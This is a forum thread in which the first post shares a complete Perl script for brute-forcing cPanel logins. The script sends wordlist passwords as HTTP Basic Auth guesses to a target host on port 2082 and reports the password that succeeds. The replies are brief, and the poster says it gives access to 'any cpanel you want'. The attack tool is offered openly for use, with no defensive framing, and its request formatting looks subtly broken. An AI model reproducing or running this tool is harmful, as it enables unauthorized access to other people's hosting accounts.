User Tag List

Results 1 to 5 of 5

Thread: Cpanel Brute Forcer

  1. #1

    Default Cpanel Brute Forcer

    THIS IS NOT MINE! All credits go to N3w7yp3, he wrote this tutorial for me. I'm just sharing it with you guys.

    It's in Perl as you'll obviously see. :]

    Code:
    #!/usr/bin/perl
     
    ##
    # Load the required modules
    ##
    use strict; # use lexical variables
    use warnings; # verbose warnings
    use IO::Socket::INET; # Enables us to use sockets
    use MIME::Base64; # Lets us base64 encode/decode
    use Getopt::Std; # Easy command line args
     
    my %options; # will will store our command line args in here
     
    getopts('t:p:d:u:h', \%options); # Get the options
    my $port = $options{p} || 2082; # port is -p, or 2082 if not specified
     
    # Check to see if we have what we need
    if(!$options{t} || !$options{u} || !$options{d})
    { # If not, goto the subroutine usage
            usage();
    }
     
    # print some info
    print "Target: $options{t}\n";
    print "Username: $options{u}\n";
    print "Password list: $options{d}\n";
     
    print "Starting...\n";
     
    # open the socket
    my $socket = IO::Socket::INET -> new (Proto => 'tcp',
            PeerAddr => $options{t},
            PeerPort => $port) || die "Can't connect to remote host.\n";
     
    # open the wordlist
    open(DICT, "<", $options{d}) || die "open(): error: $!\n";
     
    # read the wordlist one line at a time
    while(defined(my $passwd = <DICT>))
    {
            chomp $passwd; # remove the \n
            # base64 encode the info
            my $encoded = encode_base64($options{u} . ":" . $passwd);
            # print our request to the socket
            print $socket "GET / HTTP/1.1\r\n
                            Host: $options{t}:$port\r\n
                            User-Agent: Windows XP\r\n
                            Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
                            Accept-Language: en-us,en;q=0.5\r\n
                            Accept-Encoding: gzip,deflate\r\n
                            Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n
                            Keep-Alive: 300\r\n
                            Connection: keep-alive\r\n
                            Cookie: cprelogin=no\r\n
                            Authorization: Basic $encoded\r\n\r\n";
            # read for the socket one line at a time
            while(my $reply = <$socket>)
            {
                    if($reply =~ /^HTTP \/1.\d 200 (.*)$/i)
                    { # If we get an HTTP 200 OK, print the password end exit
                            close DICT;
                            close $socket;
                            print "Password: $passwd\n";
                            exit;
                    }
                    else
                    { # If not exit from this loop and try again
                            last;
                    }
            }
    }
    # we see this if the attack fails
    close DICT;
    close $socket;
    die "Password wasn't found.\n";
     
    sub usage
    { # Usage info
            print "Usage: $0 <options>\n";
            die qq(Options:
            -h\t\tThis help
            -t\t\tTarget host
            -p\t\tPort (default 2082)
            -d\t\tWordlist to use
            -u\t\tUsername\n);
    }
     
    ##
    # EOF
    ##

  2. #2
    Member soul's Avatar
    Join Date
    Apr 2008
    Location
    Dhaka, Bangladesh, Bangladesh
    Posts
    474

    Default

    what is this ?

    I'll start again
    And whatever pain may come
    Today this ends
    I'm forgiving what I've done

  3. #3

    Default

    Injecting it will give you access to any cpanel you want e.g admin cp, mod cp etc. You might have to change code for a bit though.

  4. #4
    VIP Member
    • darkcrunk's Gadgets
      • Motherboard:
      • Gigabyte Z77X-UD5H
      • CPU:
      • Intel Core i7 2600
      • RAM:
      • 16GB DDR3
      • Hard Drive:
      • ~10TB
      • Graphics Card:
      • HD 6570
      • Display:
      • Acer21 , Samsung 24
      • Sound Card:
      • Apollo UAD 2
      • Keyboard:
      • Logitech
      • Mouse:
      • 2x
      • Power Supply:
      • Thermaltake 775W
      • Operating System:
      • Win7
      • Comment:
      • :Works
      • ISP:
      • Smile/BDCOM/Link3/Telnet
      • Console:
      • 128
    darkcrunk's Avatar
    Join Date
    Feb 2008
    Location
    Dhaka
    Posts
    1,156

    Default

    how many did u get ? what lib does it use ?


  5. #5

    Default

    What do you mean how many did I get? :S It doesn't use any lib

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •  
Page generated in 0.16503 seconds with 13 queries.